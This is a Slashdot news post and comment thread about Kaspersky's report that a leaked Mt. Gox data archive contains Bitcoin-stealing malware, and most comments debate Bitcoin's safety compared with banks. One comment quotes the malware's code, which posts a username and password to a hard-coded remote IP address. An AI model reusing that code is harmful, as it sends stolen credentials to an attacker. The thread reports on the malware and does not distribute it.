Forgot your password?
typodupeerror
Security Bitcoin

Kaspersky: Mt. Gox Data Archive Contains Bitcoin-Stealing Malware 169

Posted by Unknown Lamer
from the trusting-random-zip-files-considered-harmful dept.
itwbennett writes "An archive containing transaction records from Mt. Gox that was released on the Internet last week also contains bitcoin-stealing malware for Windows and Mac, say researchers at Kaspersky Lab who have analyzed the 620MB file called MtGox2014Leak.zip. The files masquerade as Windows and Mac versions of a custom, back-office application for accessing the transaction database of Mt. Gox. However, they are actually malware programs designed to search and steal Bitcoin wallet files from computers, Kaspersky security researcher Sergey Lozhkin said Friday in a blog post."
This discussion has been archived. No new comments can be posted.

Kaspersky: Mt. Gox Data Archive Contains Bitcoin-Stealing Malware

Comments Filter:
  • Really? (Score:4, Funny)

    by SternisheFan (2529412) on Monday March 17, 2014 @08:08PM (#46512109)
    Oh yes, I totally trust easily manipulated computer bits over paper money.
    • Re:Really? (Score:4, Interesting)

      by Anonymous Coward on Monday March 17, 2014 @08:13PM (#46512149)

      ...except this was no different from someone doing the same thing to a bank. Your arguement is invalid

      • ...except this was no different from someone doing the same thing to a bank. Your arguement is invalid

        Real coin has worked for thousands of years. Bitcoins are a new, totally unproven currency. Out of the gate, their track record sucks so far. Reliable? I'd trust my 3rd cousin Wilfred to pay me back first.

        • by Anonymous Coward

          Well, except that none of the bitcoin "problems" or exploits have been with bitcoin itself. It's always some 3rd party poorly coded bullshit software (eg. exchanges, pools, online wallets, etc).

          So far no one has managed to exploit bitcoin itself.

          • Re:Really? (Score:4, Interesting)

            by SternisheFan (2529412) on Monday March 17, 2014 @08:35PM (#46512285)
            Does it really matter 'how' it happened? People are out of money, big time money. Bitcoin has not proven itself to be a reliable way to store money. Blame whatever you wish to. It is not secure to place my money in. And now Bitcoin will have to overcome the "once burned, twice shy'' hurdle.
            • by Anonymous Coward

              Bit coin is reliable. The shitty exchanges are not.
              If you have someone access to your paper wallet then the effect would be the same.

              • Mt Gox, thee top exchange for turning bitcoins into coin of the realm,

                turned out to be a house of phosphorous cards,

                and you don't see a red flag waving?

                Was your retirement locked up in there and now you find yourself too poor to pay attention?

              • Bit coin is reliable. The shitty exchanges are not. If you have someone access to your paper wallet then the effect would be the same.

                Why compare to paper? If I have bitcoin stealing malware on my computer (and there is like 150 variants of that in the wild) it will get the bitcoin even if I keep my wallet offline and encrypted, because I have to access it sometime. But, it won't get my online banking money, because they use a challenge-response protocol. Very different.

              • Re: Really? (Score:5, Insightful)

                by mlts (1038732) on Monday March 17, 2014 @11:32PM (#46513251)

                BitCoin exchanges are where banks were, pre-Great Depression. They go under, you lose your savings, period. It was only under FDR that bank losses were covered by the US government under FSLIC/FDIC/NCUA insurance.

                The BitCoin protocol has not had any attacks. It has been exchanges that were poorly run or attacks on the computers/endpoints storing BitCoin wallets. The BitCoin core protocol has proven to be secure, although there is always concern about one single party reaching the magic 51% mark.

              • Bit coin is reliable. The shitty exchanges are not. If you have someone access to your paper wallet then the effect would be the same.

                Except nobody's paper wallet is connected to the internet, and few people carry significant hordes of cash in their wallet anyway so this isn't really a fantastic comparison. Yes, one could say, "well you can move it offgrid" then you can also do the same thing with your wallet and toss it in a safe or bank security box, only then would they become equals?

                That being said, your wallet is anything but a "safe" place but I'd still say a networked computer is worse. Bitcoins on a networked computer would b

            • by mysidia (191772)

              Bitcoin has not proven itself to be a reliable way to store money.

              Neither have dollars..... you leave them lying around on your kitchen table, and someone can break in while you're away and steal them all.

              Also... if you deposit them in an investment firm who is not FDIC insured, and they go bankrupt, you might lose them all, just like with Gox.

              Plenty of people had their banking details stolen every day. Ever heard of ATM skimmers?

              • Re:Really? (Score:5, Insightful)

                by QilessQi (2044624) on Monday March 17, 2014 @09:37PM (#46512661)

                And yet, people are able to go to credit card companies and banks, dispute the fraudulent transactions, and get the money back. Because our commerce systems have evolved to cope with the reality of fraud and, consequentially, the necessity of insuring deposits through mechanisms like FDIC.

                Like it or not, the Mt.Gox fiasco demonstrates that Bitcoin is not yet ready to serve as a desirable system of currency for the masses. For all the talk about the transparency of the blockchain, no one has been able to restore those stolen coins to the hands of their rightful owners.

                Maybe someday people will be able to say, "thank God I used cryptocurrency for those transactions!". But that day is not today.

                • by Agent0013 (828350)

                  I'm not trying to say Bitcoin is the answer. It does appear to be the exchanges that are having problems and not the currency itself though.

                  The real point I want to make is that FDIC insurance has a limit. So if a bank goes under and loses all the money of the people that have put their money into that bank, each account only gets back $250,000. So people who have millions of dollars in the bank will lose out just the same as people who left their Bitcoins in Mt Gox. And in the FDIC case it is all legal, s

                  • by QilessQi (2044624)

                    Good point, which is why it's a good idea to diversify your assets among multiple banks and multiple account types at each bank (e.g., $250K in Savings, $250K in an IRA, etc.): in that manner you can have far more than $250K secured by FDIC. I'll wager that most Americans don't hit that $250K limit, and the ones who are way above it have other ways of securing their portfolio against disaster. For example, you can insure your retirement funds independently.

                    Now consider, why was FDIC brought into existence

            • Actually, yes, it does matter. That's like saying "online banking is insecure" when in fact pretty much all exploits on online banking (at least in Europe) worked only due to negligence on the user's side. I know of not a single case where it was actually the bank's fault. And trust me, there are FAR, FAR more cases than you'll ever hear about (banks tend to pay, i.e. take over the cost for the users' idiocy to hush it up).

            • Yes. The 'how' is very important.

              If a plane suddenly crashes mid-flight, and I'm due to fly on that same model next week, I'd be concerned. If the crash was due to a fundamental flaw in the fuselage, I'm cancelling my flight. If it turns out the crash was due to the plane flying over rebel-held lands and being shot by a missile, my concern about my flight from Maryland to Vermont is greatly reduced.

          • Re:Really? (Score:5, Insightful)

            by QilessQi (2044624) on Monday March 17, 2014 @09:27PM (#46512607)

            As I understand it, the Mt.Gox fiasco was due in part to a hacker's ability to exploit transaction malleability in Bitcoin. Yes, Gox should have updated their software, but the Bitcoin protocol had a known weakness in it, and we've seen the result. But let's leave that aside for a minute:

            The real problem is that people have been able to exploit the Bitcoin ecosystem, which does not yet have the resilience to deal with the way human beings expect to be able to work with money.

            If you want to create a currency for everyone, then that currency has to be simple and secure even for new adopters. Part of creating a good system (of any sort) is shielding users from serious consequences. If someone in another state charges $3000 to my credit card to buy pharmaceuticals, I'll get a call. If a legitimate vendor charges my card but fails to deliver the promised goods, Visa or MasterCard will give me my money back after one phone call and a followup letter. If my bank is robbed, my deposits are FDIC insured.

            Bitcoin enthusiasts are describing exchanges as being "just like banks", and then blaming the users for treating them like banks and keeping their coins there. Instead of castigating folks for not solely printing their wallets out on computers that have been rebooted while disconnected from the Internet for that express purpose, maybe the Bitcoin community could take a step back and find a way to make the entire ecosystem more human-proof.

            • Re:Really? (Score:4, Interesting)

              by ras (84108) <russell-slashdot ... u ['id.' in gap]> on Tuesday March 18, 2014 @02:20AM (#46513857) Homepage

              As I understand it, the Mt.Gox fiasco was due in part to a hacker's ability to exploit transaction malleability in Bitcoin. Yes, Gox should have updated their software, but the Bitcoin protocol had a known weakness in it, and we've seen the result.

              Your understanding is wrong. The mtgox fiasco didn't occur because the miners accepted malleable transactions. It happened when the miners stopped accepting transactions that were malleable. Well, not all malleable transactions. But they did stop accepting the invalid transactions mtgox was generating. Generating those invalid transactions was mtgox bug 1. Mtgox bug 2 was when people fixed their bad formatting and they were accepted the block chain, mtgox software didn't recognise them. Mtgox bug 3 was they they then repeated the same transaction without doing a full audit of their ledger to verify some other mistake hadn't been made. Doing it twice is a bit of a risk given bitcoin transactions aren't reversible. But to be fair, mtgox said they authorised such double spends manually.

              But ... it is almost inconceivable that a human authorised $350M in double spends without getting suspicious. So that brings us to the unknown mtgox bug 4. Somehow, they managed to figure out a way of authorising $350M in double spends without anybody noticing. Surely this must quality for the Guinness Book of Records greatest accounting cluster fuck of all time.

              But bitcoin protocol bug - sorry no, not this time. Bitcoin offers very few guarantees. I guess a known mining rate, whatever appears on the audit trail is the one and only correct history of bitcoin, and that history will never change are the main three. In the early days, back when people sent 1000's of bitcoins to pay for a pizza, there were bugs that in the bitcoin software that meant those guarantees weren't upheld. But it was also a nicer time. It was when bitcoin was just a toy friends played with, so such mistakes could be and were always fixed. No bitcoin has every been permanently lost because because of such bugs.

              I know I shouldn't care when a person on the internet is wrong. Not just a little bit wrong, but tinfoil hat type wrong as you are in this case. But seeing tinfoil hat comments being modded up to +5 is difficult to swallow silently.

              • by bentcd (690786)

                (...) But to be fair, mtgox said they authorised such double spends manually.

                Did this manual process by any chance involve a "Yes To All" button?

              • by QilessQi (2044624)

                Not so fast, Ras. I said that transaction malleability was exploited by hackers; it was. My only error was confusing the Mt.Gox incident with the Silk Road 2 incident. Here, from the very first paragraph of this Tech Crunch article ( http://techcrunch.com/2014/02/... [techcrunch.com] )

                Silk Road 2 moderator Defcon reported in a forum post that hackers have used a transaction malleability exploit to hack the marketplace. The hackers stole over 88,000 4474.26 bitcoins worth $2,747,000, emptying the site’s escrow accoun

                • by ras (84108)

                  I said that transaction malleability was exploited by hackers; it was.

                  I thought I was pretty clear when I said it wasn't.

                  The fact that the Bitcoin software no longer has this bug does not change the fact that it once did have this bug, and that this bug has been exploited.

                  Again no, as far as I know it was never exploited. But I can see you prefer to believe an internet echo chamber confirming your world views over me over me, who is saying you are just plain wrong. More on the dangers of doing that later. For now I assume you really are willing to discard your tin foil hat if you understood what happened. Unfortunately that is going to require going into some detail.

                  The transaction malleability problem we are discussing

          • Um, actually there has been a problem with bitcoin itself with a forked chain causing double spend issues http://www.reddit.com/r/Bitcoi... [reddit.com]
          • Right, and when people say "Oh, that was a computer error" when a computer doesn't give them the answers they want, they're wrong too, it's actually something wrong with how the computer was programmed.

            Or, maybe, perhaps, just maybe, when people say "Bitcoin" they mean "The system associated with Bitcoin", which right now is intentionally unregulated, intentionally over-automated, intentionally unreversable, has not addressed banking because of ideological considerations despite widespread use of Bitcoin

        • Re: (Score:3, Funny)

          by zieroh (307208)

          Real coin has worked for thousands of years.

          Yeah. And over those thousands of years, real coins have proved impervious to all manner of theft.

          • ... has been going on for almost as long as coinage itself. One of the advantages of paper money (in addition to weight, lower manufacturing cost, etc.) is that it can be harder to forge. Any shmuck with a press can create coins that are hard to distinguish from the real thing. On a larger scale, one of the big problems today with gold is people hollowing out gold bars and filling them with tungsten, or starting with tungsten and wrapping a small amount of gold. These are indistinguishable from the real

        • Re: (Score:3, Insightful)

          by mysidia (191772)

          Real coin has worked for thousands of years. Bitcoins are a new, totally unproven currency.

          Except "real coin" isn't what we have --- we have fiat, which is no longer backed by anything. The fed and the banks just will "federal reserve" monopoly bucks into existence.

          When you go to a store, and swipe your credit card.... you think those are "real coins" you are paying with??

          NOPE! And I assure you, this mode of payment is not thousands of years old.

          For every one of your dollars you put in the bank,

          • Re:Really? (Score:4, Informative)

            by sphealey (2855) on Monday March 17, 2014 @09:15PM (#46512503)

            - - - - - - NOPE! And I assure you, this mode of payment is not thousands of years old. - - - - - -

            Another crytocoin fanatic who hasn't bothered to read a detailed history of money, much less a standard theory of money textbook. Hint: more than one ancient language has been deciphered by translating magic documents known as "letters of credit".

            sPh

          • Re:Really? (Score:4, Insightful)

            by mbkennel (97636) on Monday March 17, 2014 @09:20PM (#46512533)
            | Except "real coin" isn't what we have --- we have fiat, which is no longer backed by anything.

            Other than the collective agreement and binding contracts by the most powerful governments and private individuals on Earth, and a deep market for liquid and tradable property as well as productive real property.

            Fiat currency is not "by fiat" automatically exchangable for a certain quantity of a certain kind of property with no market fluctuation allowed. But that doesn't mean it's not 'backed' by anything.

            Bitcoin isn't by fiat exchangable for anything either---it only has constructed scarcity.

            | The fed and the banks just will "federal reserve" monopoly bucks into existence.

            Not quite "at will" but in specific economic & financial circumstances deemed to be legal and essential parts of commerce & business.
          • by TubeSteak (669689)

            Except "real coin" isn't what we have --- we have fiat, which is no longer backed by anything.

            And once we introduced central banking, fiat has worked out a lot better than "real coin" did before we abandoned it.
            I've yet to hear a satisfactory response to the basic question of why we should go back to a deflationary currency like gold.
            If you're feeling especially pugnacious, feel free to explain how we'd go about re-implementing [gold] while avoiding the problems of its past and fixing the actual (and perceived) problems of the present.

          • by Chas (5144)

            Yet you can go to your bank any time and be guaranteed payout in real dollars.
            And you have near-zero chance of being screwed over the way these people are by collapsing exchanges.
            How likely is it that the US (and thus FDIC) are going to collapse tomorrow, or next week, or a year from now? Maybe there's a chance of it happening, but your chance of getting hit by lightning while simultaneously winning the lottery is better.
            How likely is it that one or more of these exchanges is going to fold up and disappear

            • by sfcat (872532)
              Right, cause this never happened...in the last 12 months?

              http://www.bbc.com/news/busine... [bbc.com]

              Look, people are involved and people are fallible and technology can't really prevent that. BTC as a protocol is solid and wasn't comprised. The very immature institutions that have sprung up around BTC are currently failing at their task that you have every right to criticize them. Hopefully the market will sort out some winners that can function in their institutional roles in the BTC ecosystem safely and secu

              • by Chas (5144)

                And a ponzi scheme always needs an increasing amount of money to keep going (ie next year more $$ needs to go in than last year). That doesn't seem to be a feature of the Bitcoin ecosystem.

                Really? Currently you have a virtually generated currency system that hasn't reached it's maximum number of coins generated.

                So yes, you have an increasing number of BTC coming into the system.

                You also have all these sucker^H^H^H^interested individuals helping to bloat the "value" of BTC in the short term.

                Plus sideline of space heater (BTC mining rig) sales.

                And remember that ponzi schemes always, eventually, crash. As they eventually run into a situation where people inevitably want to cash out faster than

          • by gmhowell (26755)

            Did you have a point to your rant?

        • by TheCarp (96830)

          Yes, because real coins have never been stolen. If it ever happened we might need to invent a new term like....bank robbery or something.

          You are aware, I would hope, that the GPs point was that real banks use digital legers too, and in fact do not keep most of their money in "Real coin" at all. Not only that but, using whatever manner works to steal real coin, including by the use of malware to cause changes in digitally stored legers, is actually a way your precious real coin gets stolen now.

          There is even

      • Re:Really? (Score:5, Informative)

        by ttucker (2884057) on Monday March 17, 2014 @08:24PM (#46512225)

        ...except this was no different from someone doing the same thing to a bank. Your arguement is invalid

        This is totally false. Almost all bank transactions are reversible in the case of fraud, no bitcoin transactions are ever reversible.

        • Almost all bank transactions are reversible in the case of fraud, no bitcoin transactions are ever reversible.

          The blockchain transactions aren't reversible, but neither are bank ledger transactions. At the customer service level, both can be refunded (even when it's a bad idea: see Mt. Gox). It's like like in USD's you're going to get the same bills back, but that's why currency is fungible.

        • by mysidia (191772)

          no bitcoin transactions are ever reversible.

          No cash transactions are ever reversible.

          [And Bitcoin is a form of cash.]
          There, fixed it for you.

          • No cash transactions are ever reversible.

            They are if you keep the receipt.

            • Only if the merchant or whoever you concluded the transaction with agrees to reverse it and even then, the refund is still a separate transaction from the original payment.

              A crook can give you a "receipt" and vanish from your life or make excuses to refuse refunds just about as easily with real cash as Bitcoins.

              The main differences are that Bitcoin is mostly used in higher-risk transactions and does nor have any legal protections anywhere so if you get screwed, you have little if any legal protection.

          • by ttucker (2884057)
            Nobody has ever stolen my cash by making a copy of it. My cash has never been stolen from a computer hard drive. I agree, BitCoin is a bearer insturment like cash. That said, you must admit that there are striking differences, and that there is a clear and present risk involved with keeping something so easily, and irreversibly stolen, in a computer.
            • by mysidia (191772)

              Nobody has ever stolen my cash by making a copy of it.

              And nobody has ever stolen any of my bitcoins by picking my pocket.

              In fact... they couldn't. They'd need my security codes to unlock my private key. Just like they'd need my ATM PIN number to go steal cash out my bank account.

              there is a clear and present risk involved with keeping something so easily, and irreversibly stolen, in a computer.

              There is no requirement to keep your private key on a computer.

              You can have a large number of paper wal

        • Re:Really? (Score:4, Informative)

          by Kjella (173770) on Monday March 17, 2014 @09:15PM (#46512505) Homepage

          This is totally false. Almost all bank transactions are reversible in the case of fraud, no bitcoin transactions are ever reversible.

          That's generally false [bbb.org] for wire transfers. Even if you don't do a wire transfer chances are they have some sort of money mule who'll wire the money to Nigeria and that's the last you'll see of them. The mule is of course a hobo or something with no assets to cease. In general if the receiving bank has accepted the money, it's gone. I see a few people saying you should be able to reverse one within 72 hours, but in practice I don't see anybody saying they've actually successfully reversed such a scam.

          • by ttucker (2884057)
            This is a good point, some wire transfers are irreversible... it is exactly the purpose of the money mule scheme. To initiate a wire transfer, the customer interaction required at a bank is comparable to that which is required to withdraw cash. The secrets required to do this are much less frequently available in a computer to a hacker than say, a credit card number and CCV. If wire transfers were easy, there would be no need for a money mule.

            In the case of the money mule scam, the person who initia
        • by ras (84108)

          This is totally false. Almost all bank transactions are reversible in the case of fraud, no bitcoin transactions are ever reversible.

          Only for some definition of "totally" that does mean 100% of transactions. And when you get to the the space bitcoin is trying to compete in - international direct transfers, your "totally" becomes close to 0%.

          From http://www.globalgrainsvn.com/GGS/MT103.html [globalgrainsvn.com]:

          SWIFT MT-103

          SWIFT MT-103s are the most commonly used form of SWIFT communication, and one which many people will have utilized without even knowing it. For most bank customers, they are known not as MT-103s at all, but rather as wire transfers, telegraphic transfers, or SWIFT transfers. A SWIFT MT-103 is used by the bank when its customers wish to make payment to customers of another bank in another country.

          How Do I Send A MT-103 ?

          An MT-103 is the most commonly utilized type of SWIFT message. In order to send one, simply contact your bank and let them know that you would like to send a telegraphic or wire transfer. They will require the recipient’s bank details, and also the SWIFT code of the recipient’s bank. If the recipient is not aware of their bank’s SWIFT code, it is a fairly simple matter for the recipient to inquire at their bank.

          Are MT-103s Reversible?

          No. Once a MT-103 has been made, it is not reversible. Sending a MT-103 is the equivalent of handing someone cash in many respects, so due care should be taken when initiating a MT-103.

          • And when you get to the the space bitcoin is trying to compete in - international direct transfers, your "totally" becomes close to 0%.

            Oh, really? That's what Bitcoin's meant for? Well, couldn't that have been cleared up from the beginning! I honestly read a lot of Bitcoin's advocates as claiming that Bitcoin was intended to be some kind of decentralized universal currency intended for any transaction type, from tipping Redditor whose comments you like to buying Tesla cars. But if it's actually just inte

          • by ttucker (2884057)
            While it is true that the transfers are not reversible on a whim, the bank is still liable to prove that the customer initiated the transaction, much the same as if someone appeared at the bank and withdrew cash.
            • by ras (84108)

              While it is true that the transfers are not reversible on a whim, the bank is still liable to prove that the customer initiated the transaction, much the same as if someone appeared at the bank and withdrew cash.

              Yes. But this is only because the banks can and do make mistakes, signatures can be forged and so on. One of the fundamentals bitcoin is built on is it never makes a mistake like that. Every addition to the block chain is checked by every miner, so if some random miner suffers a bit error in RAM, it will be rejected by the network. The whim part is taken care of by requiring the customer to sign the transaction using a digital signature. It can't be forged. Either the customer authorised the transacti

              • Except that not every bitcoin transaction is made by the owner. There are exploits for that. It seems disingenuous to refer to bitcoin as not having mistakes when it is possible for some people to make fraudulent transactions.

                Ah, I see that "the equivalent of giving away their banking password" is rearing its head here. Note that doing that can consist of running a computer with a fully patched operating system, anti-malware protection, etc., if it's on line. Computer security is far from what it wou

                • by ras (84108)

                  Except that not every bitcoin transaction is made by the owner.

                  I am not sure what you mean. Every spend of your bitcoins has to be signed by your private key. It doesn't have to be submitted by you, but it must be authorised by you by that signature.

                  Note that doing that can consist of running a computer with a fully patched operating system, anti-malware protection, etc., if it's on line.

                  Hmmm. What do you think bitcoin is good for? Do you think it is the equivalent of storing your life's savings under a mattress, or doing transactions?

                  You can use it to do either. The mattress scenario is easy enough. You just print your private keys out a few times on a piece of paper, and put them in safe deposit box

      • Re:Really? (Score:5, Insightful)

        by Ralph Wiggam (22354) on Monday March 17, 2014 @08:24PM (#46512227) Homepage

        How often does someone break into a bank vault? Almost never. When someone "robs a bank" they're just taking a couple thousand bucks from a teller drawer, which is negligible.

        When someone steals real money from a bank, it is insured by the FDIC.

        The impact is way, way worse with bitcoin.

        • by DarkOx (621550)

          Except Mt.Gox was never a bank, if anything its more comparable to a broker, and if there was a major theft leading to your broker going bankrupt there would be no FDIC insurance for you. Any cash you had in your account -- gone, and security not settled and in your name gone. Unless the property was recovered some how by authorities.

          • by wallsg (58203)

            Except Mt.Gox was never a bank, if anything its more comparable to a broker, and if there was a major theft leading to your broker going bankrupt there would be no FDIC insurance for you. Any cash you had in your account -- gone, and security not settled and in your name gone. Unless the property was recovered some how by authorities.

            Incorrect. SIPC (Securities Investor Protection Corporation) insurance protects cash up to $250,000 and cash and securities up to $500,000 per account. Most brokerage firms carry additional insurance, usually called "excess SIPC coverage".

            Mt. Gox was the tavern bookie that you left your winnings with, with no insurance or regulation at all.

            • by Atzanteol (99067)

              Which is what needs to be remembered in all of these bitcoin discussions. If I gave cash to "some guy" and he stole it nobody would be saying "well you just can't trust paper currency!" They'd be saying "why the fsck did you give your money to 'some guy?"

          • by wallsg (58203)

            And I totally agree with your signature calling for the repeal of the 17th Amendment.

          • Except Mt.Gox was never a bank,

            Yet somehow they possessed 6% of all the bitcoins in existence.

        • Re:Really? (Score:4, Informative)

          by mysidia (191772) on Monday March 17, 2014 @09:19PM (#46512527)

          When someone steals real money from a bank, it is insured by the FDIC.

          Actually.... loss due to fraud, theft, or accounting errors, are the iconic examples of a bank loss that IS NOT FDIC covered.

          FDIC insures the funds against the bank losing the money through the ordinary course of business (market risks -- such as the risk of borrowers defaulting on the loan, and the bank, therefore losing the principal required to cover their obligations to depositors).

          WP has some other examples [wikipedia.org] of items not insured by the FDIC, also not covered:

          Investments backed by the U.S. government, such as US Treasury securities

          The contents of safe deposit boxes. -- Even though the word deposit appears in the name, under federal law a safe deposit box is not a deposit account – it is merely a secured storage space rented by an institution to a customer.
          Losses due to theft or fraud at the institution. These situations are often covered by special insurance policies that banking institutions buy from private insurance companies.

          Accounting errors. In these situations, there may be remedies for consumers under state contract law, the Uniform Commercial Code, and some federal regulations, depending on the type of transaction.

          Insurance and annuity products, such as life, auto and homeowner's insurance.

          • by hendrips (2722525)

            While you are absolutely correct that none of these types of losses are covered by FDIC insurance, they are all covered by some kind of insurance. Your own post mentions that losses from fraud and theft are covered by special private liability insurance. Treasury bonds are backed by the full faith and credit of the U.S. government. Insurance and annuities are almost always insured by the state that the bank is operating in, usually up to somewhere between $250k and $500k. So his point is still valid - p

            • by mysidia (191772)

              they are all covered by some kind of insurance.

              You are probably covered by a special policy with a private insurance company [* Although in the event of massive theft insurance company may be found insolvent, policy may not actually exist, or the situation may have voided coverage], is a HECK of a lot different than, Your deposit is guaranteed by the FDIC, backed up by the full faith and credit of the US government.

        • For the most recent year in which statistics have been published (2011), 5,086 times, resulting in a loss of $38,343,501.96, only $8,070,886.97 was ever recovered.

          http://www.fbi.gov/stats-servi... [fbi.gov]

          • by swb (14022)

            Does this prove the grandparent's point, though?

            The average take is only $7,539.02.

            Even though only 20% is recovered, the clearance rate for bank robberies is like 60%. This says to me that the amounts taken are so small that even if you ultimately get caught, the amount stolen is small enough that a lot of it gets spent quickly before the robbers are caught. It doesn't seem likely that most bank robbers are doing 20 year Federal prison sentences to recover a haul of $7500 when they get out.

        • by ras (84108)

          How often does someone break into a bank vault? ... The impact is way, way worse with bitcoin.

          How do you know? It has never happened. There is only one bitcoin banker - it's the miners. There is only one bank statement issued by those bankers, and that's the block chain. So far the miners have never lost a bitcoin. You can verify that yourself. The block chain is a public document. I think it's fair to said bitcoin is built on the fact that they never will. It's a pretty safe bet, because if the bitcoin software adheres to the protocol description, mathematically, they never can.

          If you give

          • But your fantasy of the the vault all bitcoin is stored in being raided - that has never happened.

            6% of all of the bitcoins in existence got stolen a few weeks ago. It was merely the highest profile in a string of huge robberies.

            • by ras (84108)

              6% of all of the bitcoins in existence got stolen a few weeks ago. It was merely the highest profile in a string of huge robberies.

              True. But what does that have to do someone breaking into a bank vault? Mtgox isn't a bank. They are a broker - they buy and sell bitcoins. Some people gave them bitcoins to sell, but they lost (by double spending them) them instead.

              As I said elsewhere in this thread, here we have yet another example of someone who don't have a clue about what bitcoin is or how it operates, making a comment demonstrating his ignorance in spades and that comment modded to +5.

      • by exomondo (1725132)

        ...except this was no different from someone doing the same thing to a bank.

        It's totally different! Unlike a normal bank bitcoin transactions are irreversible, untraceable and the deposits are uninsured, the whole thing is unregulated and anonymous by design.

      • by beelsebob (529313)

        Right... because this happens so often with banks. We see a bank go pop, and everyone's money disappear every month or so, don't we.

        And you know... the government doesn't insure money held in bank accounts. It's completely the same.

        • Between 2008 and 2012, 465 separate US banks failed:

          http://en.wikipedia.org/wiki/L... [wikipedia.org]

          • And if you read the article you linked to, you'll realize that people's deposits didn't just disappear, even when the banks failed.

            • The fact someone showed up later to replace the money doesn't change the fact that the money disappeared. And the FDIC doesn't cover money lost due to theft or fraud. How about people who invested with people like Bernie Madoff?

              • People who invested with Madoff knew he was a criminal. They just thought he was their criminal. Fuck them. Same as people who left bitcoin in MtGox.

                A fool and his money were lucky to get together in the first place.

      • by Camael (1048726) on Monday March 17, 2014 @11:02PM (#46513085)

        ...except this was no different from someone doing the same thing to a bank. Your arguement is invalid

        Except that the current banking system has failsafes to protect the depositor, even if the bank is at risk. For those who still use it, bank books and pass books record how much is in your bank account. Ditto for the monthly statements sent to depositors who have an electronic account, which is a hard copy in your hand. In many jurisdictions, these are legal evidence of a debt owed by the bank to you. Most banks are insured, both privately and by their respective governments.

        If you are just a normal depositor stashing your cash in a bank account, you are much more likely to recover something in the event a bank is (electronically) robbed. Take for example the relatively recent collapse of Barings Bank [numa.com] - according to the Bank Of England Report on the Collapse of Barings, the interests of depositors and creditors were still protected although the bank was closed. Compare this with the uncertain fate of the Bitcoin depositors of Mt. Gox which just recently filed for bankruptcy.

        The truth is that depositing funds in Bitcoins right now involves taking a substantial risk which is much higher than putting it into the current banking system. Deluding uninformed investors that investing in Bitcoins is "no different" from putting it in a bank is untrue and is likely to greatly harm the Bitcoin cause once these investors are burnt.

    • by Kris_J (10111) *
      • These are not "easily manipulated", they are cryptographically secure.
      • There is zero counterfeit bitcoin. You can't say the same about paper currency.
      • This isn't about the security of bitcoin, it's about phishing and trojans.
      • There is zero counterfeit bitcoin. You can't say the same about paper currency.

        Technically correct, since bitcoin does not exist in physical form and therefore cannot be counterfeited in physical form.

        But can transactions involving bitcoins be counterfeited? Most certainly! [arstechnica.com]

        Mt. Gox, Bitstamp, and other Bitcoin exchanges have temporarily suspended withdrawal transactions after coming under a form of a denial-of-service attack that abuses weaknesses in the way they keep track of fund balances, a security expert said.

        Andreas M. Antonopoulos, chief security officer of digital wallet devel

    • by Anonymous Coward

      You think the money in your bank account is paper, and not easily manipulated computer bits? That's so cute.

    • Keep a paper bitcoin wallet. It as simple as that.

      • Not sure why that was moderated as overrated. Just to be clear that was not a joke. If you create paper wallets, and store your bitcoins in them (in whatever denominations you like, I use 1 BTC per wallet), no virus or malware or some e-wallet getting hacked, can get to your bitcoins.

  • This becoming comical to the point of absurdity.

  • by gustgr (695173) <rondina AT gmail DOT com> on Monday March 17, 2014 @08:09PM (#46512115) Homepage

    This was known minutes after the leak was released. You disappoint me, slashdot.

    • by gustgr (695173)

      Also, the MtGox2014Leak.zip file is 750672322 bytes. The trades.zip file is 622555932 bytes.

  • Leak (Score:5, Informative)

    by gustgr (695173) <rondina AT gmail DOT com> on Monday March 17, 2014 @08:11PM (#46512125) Homepage

    The leak is real, nonetheless. I found my balance and transactions there.

    • The data is publicly available.

    • by Kjella (173770)

      Of course, just like repacked cracks usually do provide you with working software - and a trojan/malware infection. Why would you want to fight negative comments and complaints that it's fake when you can deliver and turn your victims into willing advocates and distributors?

      • by gustgr (695173)

        The thing is, you don't need that .exe to access the leaked data. The leaks are just a bunch of csv files. I never run the .exe.

  • Old news. (Score:4, Informative)

    by Janek Kozicki (722688) on Monday March 17, 2014 @08:14PM (#46512161) Journal
    Coindesk already wrote about that [coindesk.com] almost two weeks ago!
    • We're like the Supreme Court here, Janek.

      If you make your way successfully through district and appeals, we might be willing to hear and comment on your case.

    • by guacamole (24270)

      Yeah, but slashdot is not coindesk. I still appreciate this gets posted on /.

  • Looks like someone posted code that shows the censored IP http://pastebin.com/w2EWMp35 [pastebin.com]

    • by mythosaz (572040)

      I'm mostly amused by the User-Agent:


            set the httpHeaders to "User-Agent: MtGoxBackOffice v0.1.2"
            libURLSetSSLVerification false
            post base64Encode("action=login&user="&field "l"&"&pass="&keyBuff&return) to "http://82.118.242.145/admin/tibanne-admin.php"

  • Almost every aspect of Bitcoin is just seeping with get rich quick scammers, schemers, and thieves and just general disgusting lowlifes. Whatever money I might have made by holding onto my bitcoins, it was worth to lose just to get out of Bitcoin and not have to associate myself with that den of scum and villianry anymore.

    • You'll find the same with the forex market and other dodgy investment schemes.

      Trading and investing is basically a game of "who is the better legal scammer".
      At it's core, it's a game with it's own rules and dirty (but legal) tricks and unsportsmanlike behavior.

      • by Bryan Ischo (893) *

        "legal scammer" is an oxymoron, but I suspect you know that.

        I also suspect that you know there is a real difference between legal forms of investment, with which you will find associated every kind of good and bad person in the world, but predominantly "normal" people availing themselves of opportunities to invest their money as they see fit, and generally with protections and expectations of security that are in the vast majority of cases respected.

        Then you have bitcoin, where you have an extremely high ch

Mathemeticians stand on each other's shoulders while computer scientists stand on each other's toes. -- Richard Hamming

Working...